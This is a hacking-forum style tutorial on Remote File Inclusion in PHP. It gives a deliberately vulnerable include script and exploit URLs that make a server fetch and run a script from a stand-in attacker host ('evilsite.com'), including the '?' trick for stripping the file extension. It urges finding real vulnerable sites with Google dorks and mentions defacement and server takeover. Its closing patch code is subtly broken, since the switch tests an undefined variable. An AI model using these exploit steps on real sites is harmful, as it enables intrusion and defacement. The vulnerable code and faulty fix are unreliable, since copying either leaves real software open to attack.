What is an RFI? and how to do it

1. What Is RFI ?
2. RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript) *client sided shiZ*.
3.  
4. RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface *if that's what you're looking for :| * the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux.
5.  
6. Starting with RFI ~
7. Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks. If you can't find one, don't worry you'll still learn Cool - Just upload this on any site and save it as index.php in a folder called rfi
8.  
9. PHP Code:
10. <?php
11. # AnonGuy's RFI Tutorial @ XplOitWorld
12. $file = $_GET['file'];
13. if ($file != null){include($file.".html");}
14. ?>
15.  
16. and save this as tut.html
17.  
18. PHP Code:
19. <html>
20. <body>
21. <center><h1>RFI</h1></center>
22. </body>
23. </html>
24.  
25.  
26. then visit
27. You must post to unlock this link
28.  
29. As you can see, this code (index.php) pulls documents from the file parameter, adds .html in the end and "includes" it.
30. If this isn't coded properly, the script doesn't check where the file is coming from and so an inclusion from another site will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another site but still run on the site being targeted. Let's Try It Out.
31.  
32.  
33. Code:
34. http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt
35.  
36.  
37.  
38. Warning: include(
39. You must post to unlock this link
40. ): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/yoursite/public_html/rfi/index.php on line 4
41.  
42. Error Undecided !
43.  
44. Idea Just like we have the %00 to get rid of the .html part in LFI you got the "?" sign in RFI. If you go to index.php?file=http://evilsite.com/evilscript.txt? it will include evilscript.txt and not evilscript.txt.php because the ? sign makes .php an GET argument! Which does not affect which file you are requesting on remote servers. Idea
45.  
46.  
47. Code:
48. http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt?
49.  
50.  
51. Anonguy Voila ! Anonguy
52.  
53. Now we know how to exploit rfi vulnerability umm, err.. but how to patch one? Undecided
54.  
55. Here you go mohit
56.  
57. How To Patch RFI/LFI ~
58. Method One (Switch Statement) ~
59.  
60. PHP Code:
61. <?php
62. $file = $_GET['file'];
63. switch($page){
64. case "about":
65. include("aboutus.html");
66. break;
67. case "contact":
68. include("contactus.html");
69. break;
70. default: # If parameter != contact or about
71. include("tut.html");
72. break;}
73. ?>
74.  
75.  
76. Method Two (If Statement) ~
77.  
78. PHP Code:
79. <?php
80. $file = $_GET['file'];
81. if (isset($file))
82. {
83. if ($file == "about")
84. {
85. include("aboutus.html");
86. }
87. elseif ($file == "contact")
88. {
89. include("contactus.html");
90. }
91. else
92. {
93. include("tut.html"); #If file param != about or contact
94. }
95. }
96. else
97. {include("tut.html");} #If someone visits the file w/o file param
98. ?>